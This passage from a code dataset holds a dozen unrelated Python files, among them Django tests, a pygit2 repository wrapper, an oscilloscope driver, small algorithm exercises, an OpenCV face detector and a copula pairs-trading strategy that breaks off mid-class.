self.assertTrue(self.sf_pubdef.has_a_pdf())\n self.assertFalse(self.cc_pubdef.has_a_pdf())\n\n def test_get_referral_emails_even_if_no_users(self):\n expected_email = \"foo@bar.net\"\n # we need an org\n org = models.Organization(name=\"Acme Nonprofit Services Inc.\")\n org.save()\n user = mock.fake_superuser()\n models.Invitation.create(\n expected_email,\n organization=org,\n inviter=user)\n emails = org.get_referral_emails()\n self.assertListEqual(emails, [expected_email])\n\n def test_get_referral_emails_raises_error_with_no_emails(self):\n org = models.Organization(name=\"Acme Nonprofit Services Inc.\")\n org.save()\n with self.assertRaises(exceptions.NoEmailsForOrgError):\n org.get_referral_emails()\n\n def test_get_transfer_org_returns_correct_org(self):\n ebclc = self.ebclc\n a_pubdef = self.a_pubdef\n self.assertEqual(ebclc.get_transfer_org(), a_pubdef)\n self.assertEqual(a_pubdef.get_transfer_org(), ebclc)\n\n def test_get_transfer_org_returns_none(self):\n sf_pubdef = self.sf_pubdef\n cc_pubdef = self.cc_pubdef\n self.assertIsNone(sf_pubdef.get_transfer_org())\n self.assertIsNone(cc_pubdef.get_transfer_org())\n\n def test_get_unopened_apps_returns_all_apps_if_no_open_events(self):\n ebclc = models.Organization.objects.get(\n slug=constants.Organizations.EBCLC)\n for org in models.Organization.objects.filter(\n is_receiving_agency=True):\n if org == ebclc:\n self.assertEqual(org.get_unopened_apps().count(), 2)\n else:\n self.assertEqual(org.get_unopened_apps().count(), 3)\n\n def test_get_unopened_apps_returns_apps_opened_by_other_org(self):\n # assume we have a multi-org app 
opened by a user from one org\n cc_pubdef = models.Organization.objects.get(\n slug=constants.Organizations.COCO_PUBDEF)\n a_pubdef = models.Organization.objects.get(\n slug=constants.Organizations.ALAMEDA_PUBDEF)\n cc_pubdef_user = models.UserProfile.objects.filter(\n organization=cc_pubdef).first().user\n sub = intake_models.FormSubmission.objects.annotate(\n org_count=Count('organizations')).filter(org_count__gte=3).first()\n intake_models.ApplicationLogEntry.log_opened([sub.id], cc_pubdef_user)\n # assert that it shows up in unopened apps\n self.assertIn(sub, a_pubdef.get_unopened_apps())\n self.assertNotIn(sub, cc_pubdef.get_unopened_apps())\n\n @patch('intake.models.ApplicationEvent.from_logs')\n def test_get_unopened_apps_with_deleted_opened_app_returns_expected_result(\n self, from_logs):\n # https://code.djangoproject.com/ticket/25467?cversion=0&cnum_hist=2\n logs = intake_models.ApplicationLogEntry.log_opened(\n [None], user=self.sf_pubdef_user)\n self.assertTrue(logs[0].id)\n self.assertIsNone(logs[0].submission_id)\n self.assertEqual(self.sf_pubdef.get_unopened_apps().count(), 3)\n","sub_path":"user_accounts/tests/models/test_organization.py","file_name":"test_organization.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"603935451","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nfrom future import standard_library\n\nimport numpy as np\n\nstandard_library.install_aliases()\n\n\ndef kernel_delta_norm(X_in_1, X_in_2):\n n_1 = X_in_1.shape[1]\n n_2 = X_in_2.shape[1]\n K = np.zeros((n_1, n_2))\n\n u_list = np.unique(X_in_1)\n for ind in u_list:\n ind_1 = (X_in_1 == ind)\n ind_2 = (X_in_2 == ind)\n idx = (ind_1 & ind_2.T)\n c_1 = np.sqrt(np.count_nonzero(ind_1))\n c_2 = np.sqrt(np.count_nonzero(ind_2))\n K[idx] = 1 / c_1 / c_2\n return K\n\n\ndef kernel_delta(X_in_1, X_in_2):\n n_1 = X_in_1.shape[1]\n n_2 = X_in_2.shape[1]\n K = np.zeros((n_1, n_2))\n u_list = np.unique(X_in_1)\n for ind in u_list:\n ind_1 = (X_in_1 == ind)\n ind_2 = (X_in_2 == ind)\n idx = (ind_1 & ind_2.T)\n K[idx] = 1\n return K\n\n\ndef kernel_gaussian(X_in_1, X_in_2, sigma):\n X_in_12 = np.sum(np.power(X_in_1, 2), 0)\n X_in_12 = np.expand_dims(X_in_12, 0)\n X_in_22 = np.sum(np.power(X_in_2, 2), 0)\n X_in_22 = np.expand_dims(X_in_22, 0)\n dist_2 = (X_in_12 + X_in_22.T) - 2 * np.dot(X_in_1.T, X_in_2)\n K = np.exp(-dist_2 / (2 * np.power(sigma, 2)))\n return K\n","sub_path":"pyHSICLasso-master/pyHSICLasso-master/pyHSICLasso/kernel_tools.py","file_name":"kernel_tools.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"382686883","text":"from collections import deque\ndx = [1,0,-1,0]\ndy = [0,1,0,-1]\n\nheight = 12\nwidth = 6\nboard = [ list(input()) for _ in range(height)]\n\n#뿌요 떨어짐\ndef down(board):\n for i in range(height-1,-1,-1):\n for j in range(width):\n x = i\n while True:\n x += 1\n if x >= height or board[x][j] != \".\":\n break\n board[x][j] = board[x-1][j]\n board[x-1][j] = \".\"\n\ndef bfs(i,j,visited,board):\n\n que = deque()\n que.append((i,j))\n points = [[i,j]]\n color = board[i][j]\n \n while que:\n cx,cy = que.popleft()\n\n for i in range(4):\n nx = cx + dx[i]\n ny = cy + dy[i]\n\n if 0 <= nx < height and 0<= ny < width and not visited[nx][ny]:\n if color == board[nx][ny]:\n visited[nx][ny] = True\n 
que.append((nx,ny))\n points.append((nx,ny))\n\n if len(points) >= 4:\n for x, y in points:\n board[x][y] = \".\"\n return True\n else:\n return False\n\n\n\n#뿌요 연쇄\ndef bomb(board):\n visited = [ [False for _ in range(width)] for _ in range(height) ]\n find = False\n for i in range(height):\n for j in range(width):\n if board[i][j] != \".\" and not visited[i][j]:\n visited[i][j] = True\n if bfs(i,j,visited,board):\n find = True\n return find\n\ncnt = 0\nwhile True:\n down(board)\n if bomb(board):\n cnt+=1\n else:\n print(cnt)\n break\n\n","sub_path":"3.beakjoon/구현/BOJ_11559_뿌요뿌요.py","file_name":"BOJ_11559_뿌요뿌요.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"421531445","text":"from src.Managers.HardwareManager.HardwareDevice import HardwareDevice\nimport niscope, time, numpy as np\nfrom src.Managers.HardwareManager.PacketCommands import *\nfrom src.Managers.HardwareManager.PacketMeasurements import *\n\nms = lambda: int(round(time.time() * 1000))\n\nclass PXIe_5105(HardwareDevice):\n hardwareType = 'NI PXIe-5105'\n hardwareIdentifier = 'MRB_PXIe5105'\n hardwareVersion = '1.0'\n hardwareCreator = 'Matthew R. Brantley & Ian G. M. Anthony'\n hardwareVersionDate = '5/28/2019'\n\n############################################################################################\n##################################### MANDATORY FUNCS ######################################\n def scan(self):\n for device in self.systemDeviceInfo['NI-SCOPE']:\n if(device['Device Model'] == 'NI PXIe-5105'):\n self.Add_Device(device['Device Name'])\n\n self.Add_Trigger_Mode('Software')\n self.Add_Trigger_Mode('Front Digital Trigger')\n self.scanned.emit()\n\n def initialize(self, deviceName, triggerMode):\n self.booting = True\n try:\n if(deviceName != ''):\n self.session = None\n self.wfm_handles = list()\n self.reportTime = ms()\n with niscope.Session(deviceName) as session:\n # Would get more session data here\n self.source0 = self.Add_AISource('0', -10, 10, 0.1)\n self.source1 = self.Add_AISource('1', -10, 10, 0.1)\n self.source2 = self.Add_AISource('2', -10, 10, 0.1)\n self.source3 = self.Add_AISource('3', -10, 10, 0.1)\n self.source4 = self.Add_AISource('4', -10, 10, 0.1)\n self.source5 = self.Add_AISource('5', -10, 10, 0.1)\n self.source6 = self.Add_AISource('6', -10, 10, 0.1)\n self.source7 = self.Add_AISource('7', -10, 10, 0.1)\n\n self.session = niscope.Session(deviceName)\n\n if(triggerMode == 'Front Digital Trigger'):\n self.Add_Digital_Trigger('PFI1')\n except:\n pass\n\n self.initialized.emit()\n\n def configure(self):\n \n self.configured.emit()\n\n def program(self, programmingPackets):\n self.Set_Ready_Status(False)\n if(programmingPackets):\n packet = programmingPackets[0]['programmingPacket'].Get_Commands(commandType=AnalogAcquisitionCommand)\n if packet:\n packet = packet[0]\n if(packet is not None):\n self.session.abort()\n self.session.vertical_range = packet.acqMax-packet.acqMin\n self.session.vertical_coupling = niscope.VerticalCoupling.DC\n self.session.vertical_offset = (packet.acqMin + packet.acqMax) / 2\n self.session.probe_attenuation = 1\n self.session.channels[0].channel_enabled = True\n self.session.channels[1].channel_enabled = False\n self.session.channels[2].channel_enabled = True\n self.session.channels[3].channel_enabled = False\n self.session.channels[4].channel_enabled = False\n self.session.channels[5].channel_enabled = False\n self.session.channels[6].channel_enabled = False\n 
self.session.channels[7].channel_enabled = False\n\n self.session.input_clock_source = 'PXI_CLK10'\n self.session.min_sample_rate = packet.rate\n self.session.horz_min_num_pts = packet.noSamples\n self.session.horz_record_ref_position = 0\n self.session.horz_num_records = 1\n self.session.horz_enforce_realtime = True\n\n self.session.trigger_type = niscope.TriggerType.EDGE\n self.session.trigger_level = 2.0\n self.session.trigger_source = '0' \n\n self.readArray = np.ndarray(packet.noSamples, dtype=np.float64)\n\n self.Send_Status_Message('Progam Rate (Hz): ' + str(packet.rate))\n self.Send_Status_Message('Real Rate (Hz): ' + str(self.session.horz_sample_rate))\n\n self.booting = False\n self.Set_Ready_Status(True)\n self.programmed.emit()\n\n def softTrigger(self):\n self.Set_Ready_Status(False)\n self.session.initiate()\n \n self.softTriggered.emit()\n\n def shutdown(self):\n if(self.session is not None):\n self.session.close()\n\n def idle(self):\n if(hasattr(self, 'session')):\n if(self.session is not None):\n try:\n if(not self.booting):\n if(self.session.acquisition_status() == niscope.AcquisitionStatus.COMPLETE):\n if(self.Ready_Status() is False):\n self.Send_Status_Message('Triggered!')\n wfmInfo = self.session.channels[2].fetch_into(self.readArray)\n self.writeToPacket(self.readArray, wfmInfo[0])\n self.session.abort()\n self.Set_Ready_Status(True)\n\n else:\n if(ms() - self.reportTime >= 500):\n self.Send_Status_Message('Armed! Waiting for trigger...')\n self.reportTime = ms()\n except:\n pass\n \n def stop(self):\n self.Send_Status_Message('Sending Stop Command...')\n if(hasattr(self, 'session')):\n if(self.session is not None):\n try:\n self.session.abort()\n except:\n pass\n\n############################################################################################\n###################################### INTERNAL FUNCS ######################################\n\n def writeToPacket(self, nparray, wfmInfo):\n mPack = measurementPacket()\n measurement = AnalogWaveformMeasurement(wfmInfo.absolute_initial_x, 1/wfmInfo.x_increment, nparray)\n mPack.Add_Measurement(measurement)\n self.Push_Measurements_Packet(self.source2, mPack)\n","sub_path":"Hardware Drivers/PXIe_5105.py","file_name":"PXIe_5105.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"546968485","text":"import pyautogui\nfrom PIL import Image, ImageGrab\n\ndef press(key):\n pyautogui.keyDown(key)\n return\n\ndef detection(picinfo):\n \n # Draw a square to detect night\n for i in range(600,610):\n for j in range(600,610):\n if picinfo[i, j] > 150: time = \"day\"\n if picinfo[i, j] < 150: time = \"night\"\n \n # Draw the rectangle for cactus\n for x in range(150, 390):\n for y in range(375, 450):\n if time == \"day\":\n if picinfo[x, y] < 86:\n press(\"space\")\n return\n if time == \"night\":\n if picinfo[x, y] > 86:\n press(\"space\")\n return\n\nimport time\ntime.sleep(4)\n\nwhile True:\n image = ImageGrab.grab().convert('L') \n picinfo = image.load()\n detection(picinfo)\n \n '''\n # Draw the rectangle for cactus\n for x in range(150, 390):\n for y in range(375, 450):\n picinfo[x, y] = 86\n \n # Draw blank space to detect night\n for i in range(600,610):\n for j in range(600,610):\n picinfo[i, j] = 86\n \n image.show()\n break'''\n","sub_path":"Others/My Projects/Google Dino 
Game/full.py","file_name":"full.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"433583091","text":"import urllib.request\nimport time\n\nclass mobio:\n def CheckCode(self,servId,code):\n\n self.servId = servId\n self.code = code\n\n request = urllib.request.urlopen(\"http://www.mobio.bg/code/checkcode.php?servID={0}&code={1}\".format(self.servId,self.code))\n answer = request.read()\n reader = answer.decode(\"utf8\")\n request.close()\n \n if request:\n if reader == \"PAYBG=OK\":\n return 1\n else:\n return 0\n else:\n return 0\n","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"137232333","text":"import math\n\n# What is the smallest value of n such that an algorithm whose running time is 100n^2\n# runs faster than an algorithm whose running time is 2^n on the same machine?\n\nn = 1\nrt1 = 100 * (n ** 2)\nrt2 = 2 ** n\nwhile (rt1 >= rt2):\n print(\"n: {}, 100n^2 rt: {}, 2^n rt: {}\".format(n, rt1, rt2))\n n += 1\n rt1 = 100 * (n ** 2)\n rt2 = 2 ** n\n\n# Answer: n = 15. The loop prints up to n = 14, where 100n^2 = 19600 still exceeds\n# 2^14 = 16384; at n = 15, 2^15 = 32768 first exceeds 100 * 15^2 = 22500, so from\n# n = 15 onward the 100n^2 algorithm is the faster one.\n","sub_path":"Foundations/running_times(1.2-3).py","file_name":"running_times(1.2-3).py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"375634898","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom pygit2 import Repository\nfrom pygit2 import GIT_OBJ_TAG\nfrom pygit2 import GIT_OBJ_BLOB\nfrom pygit2 import GIT_OBJ_TREE\nfrom pygit2 import GIT_OBJ_COMMIT\nfrom pygit2 import GIT_DIFF_IGNORE_WHITESPACE\n\nfrom utils import JagareError\nfrom utils.git import format_blob\nfrom utils.git import format_tree\nfrom utils.git import format_commit\nfrom utils.git import format_tag\nfrom utils.git import format_blame\nfrom utils.git import format_diff\nfrom utils.git import _resolve_version\nfrom utils.git import _resolve_type\nfrom utils.process import call, call2, _shlex_split\nfrom tree import ls_tree\nfrom rev_list import rev_list\nfrom rename import detect_renamed\nfrom tag import list_tags\nfrom commit import create_commit\nfrom diff import diff\nfrom ref import update_ref\nfrom clone import clone_repository\nfrom clone import update_server_info\nfrom init import init_repository\nfrom archive import archive_repository\n\n\nclass Jagare(object):\n ''' pygit2 and git commands wrapper '''\n\n def __init__(self, path):\n self.repository = repository(path)\n self.repository_name = None\n\n @property\n def empty(self):\n return self.repository.is_empty\n\n @property\n def bare(self):\n return self.repository.is_bare\n\n @property\n def branches(self):\n return self.list_branches()\n\n @property\n def tags(self):\n return self.list_tags(name_only=True)\n\n def list_tags(self, *w, **kw):\n return list_tags(self.repository, *w, **kw)\n\n def list_branches(self):\n branches = self.repository.listall_branches()\n return branches\n\n def show(self, ref):\n try:\n obj = self.repository.revparse_single(ref)\n except KeyError:\n return {}\n obj_type = obj.type\n\n if obj_type == GIT_OBJ_COMMIT:\n return format_commit(ref, obj, self.repository)\n elif obj_type == GIT_OBJ_TAG:\n return format_tag(ref, obj, self.repository)\n elif obj_type == GIT_OBJ_TREE:\n return format_tree(ref, obj, 
self.repository)\n elif obj_type == GIT_OBJ_BLOB:\n return format_blob(ref, obj, self.repository)\n\n def ls_tree(self, ref, path=None, recursive=False, size=None, with_commit=False):\n return ls_tree(self.repository, ref, req_path=path,\n recursive=recursive, size=size, with_commit=with_commit)\n\n def rev_list(self, *w, **kw):\n commits = []\n try:\n commits = rev_list(self.repository, *w, **kw)\n except KeyError:\n # FIXME: use JagareError\n pass\n return commits\n\n def blame(self, ref, path, lineno=None):\n if lineno:\n result = call(self.repository,\n 'blame -L %s,%s --porcelain %s -- %s' % (\n lineno, lineno, ref, path))\n else:\n result = call(self.repository,\n 'blame -p -CM %s -- %s' % (ref, path))\n result = format_blame(result['stdout'], self.repository)\n return self.show(ref), result\n\n def format_patch(self, ref, from_ref=None):\n if from_ref:\n result = call(self.repository, 'format-patch --stdout %s...%s' % (from_ref, ref))\n else:\n result = call(self.repository, 'format-patch -1 --stdout %s' % ref)\n return result['stdout']\n\n def detect_renamed(self, ref, path=None):\n return detect_renamed(self.repository, ref)\n\n def commit_file(self, *w, **kw):\n return create_commit(self.repository, *w, **kw)\n\n def diff(self, *w, **kw):\n ''' Jagare's diff wrapper '''\n try:\n kws = {}\n ignore_space = kw.get('ignore_space', None)\n if ignore_space:\n flags = kw.get('flags', 0)\n flags |= GIT_DIFF_IGNORE_WHITESPACE\n kws.update({'flags': flags})\n from_ref = kw.get('from_ref', None)\n if from_ref:\n kws.update({'from_ref': from_ref})\n context_lines = kw.get('context_lines', None)\n if context_lines:\n kws.update({'context_lines': context_lines})\n path = kw.get('path', None)\n paths = kw.get('paths', None)\n if path:\n kws.update({'paths': [path]})\n if paths:\n kws.update({'paths': paths})\n # call diff\n d = diff(self.repository, *w, **kws)\n rename_detection = kw.get('rename_detection', None)\n if rename_detection:\n d['diff'].find_similar()\n #d.find_similar()\n # return formated diff dict\n return format_diff(d)\n except JagareError:\n return []\n\n def resolve_commit(self, version):\n version = version.strip()\n return _resolve_version(self.repository, version)\n\n def resolve_type(self, version):\n version = version.strip()\n return _resolve_type(self.repository, version)\n\n def clone(self, path, bare=None, branch=None, mirror=None, env=None):\n # TODO: check clone result\n clone_repository(self.repository.path, path,\n bare=bare, checkout_branch=branch,\n mirror=mirror, env=env)\n jagare = Jagare(path)\n if bare:\n update_server_info(jagare.repository)\n return jagare\n\n @classmethod\n def mirror(cls, url, path, bare=None, branch=None, env=None):\n # TODO: check clone result\n clone_repository(url, path,\n bare=bare, checkout_branch=branch,\n mirror=True, env=env)\n jagare = Jagare(path)\n if bare:\n update_server_info(jagare.repository)\n return jagare\n\n @classmethod\n def init(cls, path, work_path=None, bare=None):\n # TODO: move to libs\n # if parent dir not exist, create it.\n # else git init will fail\n if not os.path.exists(path):\n os.makedirs(path)\n init_repository(path, work_path=work_path, bare=bare)\n return cls(path)\n\n def revparse_single(self, *w, **kw):\n try:\n return super(GitRepository, self).revparse_single(*w, **kw)\n except (KeyError, ValueError):\n raise JagareError(\"rev not found.\")\n\n def listall_references(self):\n return self.repository.listall_references()\n\n def lookup_reference(self, *w, **kw):\n return 
self.repository.lookup_reference(*w, **kw)\n\n def read(self, *w, **kw):\n try:\n return super(GitRepository, self).read(*w, **kw)\n except ValueError:\n raise JagareError(\"sha not found\")\n\n def add_remote(self, name, url):\n self.repository.create_remote(name, url)\n\n def update_ref(self, ref, newvalue):\n return update_ref(self.repository, ref, newvalue)\n\n def sha(self, rev='HEAD'):\n return _resolve_version(self.repository, rev)\n\n def merge_base(self, to_sha, from_sha):\n return self.repository.merge_base(to_sha, from_sha)\n\n def remotes(self):\n return self.repository.remotes\n\n def fetch_all(self):\n for remote in self.remotes():\n remote.fetch()\n\n def fetch(self, name):\n target = ''\n for remote in self.remotes():\n if remote.name == name:\n target = remote\n if target:\n target.fetch()\n\n def merge(self, ref, msg='automerge', commit_msg='', no_ff=False, _raise=True, _env=None):\n cmd = ['merge', ref]\n if msg:\n cmd.append('-m')\n cmd.append(msg)\n if commit_msg:\n cmd.append('-m')\n cmd.append(commit_msg)\n if no_ff:\n cmd.append('--no-ff')\n errcode = call(self.repository, cmd, env=_env)\n return errcode\n\n def push(self, remote, ref):\n cmd = ['push', remote, ref]\n errcode = call(self.repository, cmd)\n return errcode\n\n def archive(self, prefix):\n result = archive_repository(self.repository.path, prefix)\n return result['stdout']\n\n def delete_branch(self, name):\n branch = self.repository.lookup_branch(name)\n if branch:\n branch.delete()\n\n\ndef repository(path):\n try:\n repo = Repository(path)\n except KeyError:\n raise JagareError('repo %s not exists' % path)\n return repo\n","sub_path":"ellen/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"143879026","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n# Version: 1.0\n# Author: jtahstu\n# Contact: root@jtahstu.com\n# Site: blog.jtahstu.com\n# Software: PyCharm\n# Time: 2018/8/24 10:16\n\ndef singleNumber(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n res = {}\n for k, v in enumerate(nums):\n if v in res:\n res[v] += 1\n else:\n res[v] = 1\n for (k, v) in res.items():\n if v == 1:\n return k\n\n # return sum(list(set(nums))) * 2 - sum(nums)\n\n # n = 0\n # for num in nums:\n # n ^= num\n # return n\n\ndef init():\n l = [4, 1, 2, 1, 2]\n print(singleNumber(l))\n\n\nif __name__ == '__main__':\n init()\n","sub_path":"2018/leetcode/single-number.py","file_name":"single-number.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"567198163","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Make a 9x9 grid...\nnrows, ncols = 21,21\nimage = np.zeros((nrows,ncols))\n\n\nfor i in range(7):\t\n\timage[2:nrows-2,3*i+1] =np.ones((ncols-4,))\n\n\nrow_labels = range(nrows)\ncol_labels = range(ncols)\nplt.matshow(image)\nplt.xticks(range(ncols), col_labels)\nplt.yticks(range(nrows), row_labels)\nplt.show()","sub_path":"mapa.py","file_name":"mapa.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"124629785","text":"import cv2 as cv\n\n# Function to apply the captured frame to the classifiers and draw ROIs where detections are made.\ndef detect_faces_and_eyes(frame):\n frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n frame_gray = cv.equalizeHist(frame_gray)\n\n 
face_line_color = (0, 255, 0)\n face_line_type = cv.LINE_4\n\n eye_line_color = (0, 0, 255)\n eye_line_type = cv.LINE_4\n\n # Detect faces\n faces = face_cascade.detectMultiScale(frame_gray)\n\n for (x, y, w, h) in faces:\n top_left = (x, y)\n bottom_right = (x + w, y + h)\n\n # Draw face ROI\n frame = cv.rectangle(frame, top_left, bottom_right, face_line_color, lineType=face_line_type)\n faceROI = frame_gray[y:y+h, x:x+w]\n\n # Detect eyes within detected face\n eyes = eyes_cascade.detectMultiScale(faceROI)\n for (x2, y2, w2, h2) in eyes:\n eye_top_left = (x+x2, y+y2)\n eye_bottom_right = (x+x2 + w2, y+y2 + h2)\n\n # Draw eye ROI\n frame = cv.rectangle(frame, eye_top_left, eye_bottom_right, eye_line_color, lineType=eye_line_type)\n\n cv.imshow('Capture - Face detection', frame)\n\n\n# Initialise Face Cascade\nface_cascade = cv.CascadeClassifier('haarcascades/haarcascade_frontalface_alt.xml')\n\n# Initialise Eye Cascade\neyes_cascade = cv.CascadeClassifier('haarcascades/haarcascade_eye_tree_eyeglasses.xml')\n\n# Capture from camera\ncap = cv.VideoCapture(0)\n\nif not cap.isOpened:\n print('ERROR: Cannot open video capture.')\n exit(0)\n\nwhile True:\n ret, frame = cap.read()\n\n if frame is None:\n print(\"WARNING: No frame captured.\")\n break\n\n detect_faces_and_eyes(frame)\n\n if cv.waitKey(10) == 27:\n break","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"462065213","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport random\nfrom STRATEGY.BaseTradeEngine import BaseTradeEngine\nfrom statsmodels.distributions.empirical_distribution import ECDF\nfrom statsmodels.regression.rolling import RollingOLS\nfrom scipy import stats\nfrom scipy.optimize import minimize\nfrom scipy import integrate as ig\n\ndef get_src_cls(source_name):\n return getattr(sys.modules[__name__], source_name)\n\nclass Copula(BaseTradeEngine):\n \n def __init__(self, *args, **kwargs):\n super(Copula, self).__init__(*args, **kwargs)\n \n # Run a backtest with given parameter inputs\n def process(self, windowOLS = 150, copula_lookback = 150, recalibrate_n = 50, \n cap_CL = 0.95, floor_CL = 0.05, lag = 0, rounding = 3, resample = 1, train_rng = [0,1], **kwargs):\n \n minWindowOLS = int(min(max(windowOLS/np.sqrt(resample),10),len(self.original_x)/2))\n \n minCopula = int(min(max(copula_lookback/np.sqrt(resample),recalibrate_n),len(self.original_x)/2))\n minRecalib = int(max(recalibrate_n/np.sqrt(resample),5))\n \n # Calibrate OLS if necessary\n if minCopula != self.copula_lookback or minRecalib != self.recalibrate_n \\\n or minWindowOLS != self.windowOLS or resample != self.resample:\n self.resampling(resample)\n self.calibrate(minWindowOLS,minCopula,minRecalib)\n self.resample = resample\n \n # Get start and end time for data\n start_hist, end_hist = self.get_indices(train_rng)\n \n #In any case, start data after enough data gathered for the OLS window\n min_start = (max(minWindowOLS,minCopula)-1) / len(self.x) \n train_rng[0] = max(train_rng[0],min_start)\n \n subsamples = [self.buy_x , self.buy_y, self.sell_x, self.sell_y, self.beta, \\\n self.timestamp, self.MI_u_v, self.MI_v_u]\n \n [buy_x, buy_y, sell_x, sell_y, beta, time, MI_u_v, MI_v_u] = \\\n self.get_sample(start_hist, end_hist, *subsamples)\n \n parameters = {'beta': beta, 'floor_CL':floor_CL , 'cap_CL': cap_CL,\n 'lag': lag, 'rounding': rounding, 'MI_u_v': MI_u_v, 'MI_v_u': MI_v_u}\n \n 
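        # Worked example of the window clamping above (numbers invented for
        # illustration): with windowOLS = 150, resample = 4 and a series of
        # 1000 points, minWindowOLS = int(min(max(150 / sqrt(4), 10), 1000 / 2))
        # = int(min(max(75.0, 10), 500)) = 75 -- the OLS window shrinks with
        # the square root of the resampling factor while staying between 10
        # observations and half the sample length.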
parameters.update(kwargs)\n \n # Create the record\n self.record = self.backtest(buy_x, buy_y, sell_x, sell_y, time, **parameters)\n \n # Legacy\n self.reward = sum(self.record.port_rets)\n \n \n def calibrate(self, windowOLS, copula_lookback, recalibrate_n, **kwargs):\n self.windowOLS = int(windowOLS)\n self.copula_lookback = int(copula_lookback)\n self.recalibrate_n = int(recalibrate_n)\n \n df = pd.DataFrame({'y':self.y,'x':self.x,'c':1})\n \n model = RollingOLS(endog =df['y'], exog=df['x'],window=self.windowOLS)\n rres = model.fit()\n \n self.beta = rres.params['x'].values.reshape(-1, )\n \n # Copula decision:\n df['x_log_ret']= np.log(df.x) - np.log(df.x.shift(1))\n df['y_log_ret']= np.log(df.y) - np.log(df.y.shift(1))\n \n # Convert the two returns series to two uniform values u and v using the empirical distribution functions\n ecdf_x, ecdf_y = ECDF(df.x_log_ret), ECDF(df.y_log_ret)\n u, v = [ecdf_x(a) for a in df.x_log_ret], [ecdf_y(a) for a in df.y_log_ret]\n \n # Compute the Akaike Information Criterion (AIC) for different copulas and choose copula with minimum AIC\n tau = stats.kendalltau(df.x_log_ret, df.y_log_ret)[0] # estimate Kendall'rank correlation\n AIC ={} # generate a dict with key being the copula family, value = [theta, AIC]\n\n for i in ['clayton', 'frank', 'gumbel']:\n param = self._parameter(i, tau)\n lpdf = [self._lpdf_copula(i, param, x, y) for (x, y) in zip(u, v)]\n # Replace nan with zero and inf with finite numbers in lpdf list\n lpdf = np.nan_to_num(lpdf) \n loglikelihood = sum(lpdf)\n AIC[i] = [param, -2 * loglikelihood + 2]\n # Choose the copula with the minimum AIC\n copula = min(AIC.items(), key = lambda x: x[1][1])[0]\n \n self.startIdx = copula_lookback + 1 # Because first is NAN\n \n df['MI_u_v'] = 0.5\n df['MI_v_u'] = 0.5\n \n for i in np.arange(self.startIdx , len(df)-recalibrate_n, recalibrate_n):\n \n window = range(i - copula_lookback, i) \n predWindow = range(i, i + recalibrate_n)\n \n x_hist = df.x_log_ret.iloc[window]\n y_hist = df.y_log_ret.iloc[window]\n x_forw = df.x_log_ret.iloc[predWindow]\n y_forw = df.y_log_ret.iloc[predWindow]\n \n # Estimate Kendall'rank correlation\n tau = stats.kendalltau(x_hist, y_hist)[0] \n\n # Estimate the copula parameter: theta\n theta = self._parameter(copula, tau)\n\n # Simulate the empirical distribution function for returns of selected trading pair\n ecdf_x, ecdf_y = ECDF(x_hist), ECDF(y_hist) \n\n # Now get future values\n a, b = self._misprice_index(copula, theta, ecdf_x(x_forw), ecdf_y(y_forw))\n \n df.MI_u_v.iloc[predWindow] = a\n df.MI_v_u.iloc[predWindow] = b\n \n self.MI_u_v = df.MI_u_v\n self.MI_v_u = df.MI_v_u\n \n \n def calculate_hr(self, record, beta, rounding, **kwargs):\n record['hr'] = beta.round(int(rounding))\n return record\n \n def calculate_signals(self, record, MI_u_v, MI_v_u, lag, **kwargs):\n \n record['MI_u_v'] = MI_u_v.values\n record['MI_v_u'] = MI_v_u.values \n \n return record\n \n \n def calculate_thresholds(self, record, cap_CL, floor_CL, **kwargs):\n record['cap'] = cap_CL\n record['floor'] = floor_CL\n return record\n \n def calculate_entry_exit(self, record):\n \n record['long_entry'] = (record.MI_u_v > record.cap) & (record.MI_v_u < record.floor)\n record['long_exit'] = (record.MI_v_u > (record.cap -0.1)) & (record.MI_u_v < (record.floor + 0.1))\n record['long_exit'][-1] = True\n \n # Set up num units short\n record['short_entry'] = (record.MI_v_u > record.cap) & (record.MI_u_v < record.floor)\n record['short_exit'] = (record.MI_u_v > (record.cap -0.1)) & (record.MI_v_u < 
